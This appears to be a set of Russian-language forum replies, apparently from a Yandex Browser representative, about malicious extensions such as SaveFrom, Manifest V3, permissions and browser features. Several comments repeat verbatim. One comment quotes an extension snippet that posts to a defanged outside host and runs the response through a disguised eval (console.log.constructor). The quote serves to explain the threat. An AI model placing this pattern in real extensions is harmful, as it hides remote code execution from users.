Система разрешений есть, но расширения запрашивают слишком широкие права. В целом, готовится переход на расширения Manifest V3, где исполнение удаленного кода будет запрещено.
Мы думаем над тем, как лучше отлавливать такие случаи, да. Плюс готовится внедрение расширений Manifest V3, где исполнение удаленного кода будет запрещено.
Панель очень удобна, если ее закрепить на экране в постоянном режиме. Там отличное управление вкладками, музыкой, быстрый поиск по истории и закладкам, плюс недавно появилась панель приложений, куда можно вынести любимые веб-аппы.
А про парольный менеджер можете пожалуйста чуточку подробнее? Которое окошко медленно выплывает? Саджест подстановки/сохранения пароля у поля ввода?
А потом разработчик коммитит в репозиторий совершенно невинно выглядящий код, который eval()-ит строчку из интернета. Например, из одного из расширений:
$.post('http://somesite[.]ru/ext/stat?' + $.param(params), function (res)
{
res && console.log.constructor(res)(); // это eval
});
Яндекс не занимается незаконным сливом информации. Яндекс отвечает только на запросы правоохранительных органов различных стран, на которые должен ответить согласно законодательству, и только если они оформлены надлежащим образом.
Я не знаю, что у вас и не писал, что конкретно у вас.
Давайте я ещё раз объясню логику:
1. есть витрина, стор расширений. На ней есть несколько расширений, это просто буквы, их кода нет на вашем телефоне, пока вы не нажмете кнопку включить или установить.
2. если вы нажмете включить/установить, код скачается, расширение установится, и появится возможность его отключить. Удалить с витрины расширение нельзя.
3. с этой витрины мы убрали savefrom, после того, как обнаружили то, что в посте.
4. ниже под этой витриной список установленных (включенных либо отключенных) у вас расширений, откуда вы можете их включать, выключать и удалять.
Не заменили, в браузере есть и локальные закладки, и облачные коллекции.
Система разрешений есть, но расширения запрашивают слишком широкие права. В целом, готовится переход на расширения Manifest V3, где исполнение удаленного кода будет запрещено.
А как вы определили основной источник?
Мы думаем над тем, как лучше отлавливать такие случаи, да. Плюс готовится внедрение расширений Manifest V3, где исполнение удаленного кода будет запрещено.
Это может быть не расширение, а задача в планировщике винды или малварь. Стоит проверить антивирусом.
Панель очень удобна, если ее закрепить на экране в постоянном режиме. Там отличное управление вкладками, музыкой, быстрый поиск по истории и закладкам, плюс недавно появилась панель приложений, куда можно вынести любимые веб-аппы.
А про парольный менеджер можете пожалуйста чуточку подробнее? Которое окошко медленно выплывает? Саджест подстановки/сохранения пароля у поля ввода?
Можете пояснить, что значит «распихивают рекламу по устройствам»?
А можете примеры таких замораживателей дать, пожалуйста? Посмотрим. что с ними не так.
Меры примем, но собственно я повторю: в сторах Оперы и Хрома всё то же самое :(
Давайте я ещё раз объясню логику:
1. есть витрина, стор расширений. На ней есть несколько расширений, это просто буквы, их кода нет на вашем телефоне, пока вы не нажмете кнопку включить или установить.
2. если вы нажмете включить/установить, код скачается, расширение установится, и появится возможность его отключить. Удалить с витрины расширение нельзя.
3. с этой витрины мы убрали savefrom, после того, как обнаружили то, что в посте.
4. ниже под этой витриной список установленных (включенных либо отключенных) у вас расширений, откуда вы можете их включать, выключать и удалять.
Так вот же, всё выключил: ya.ru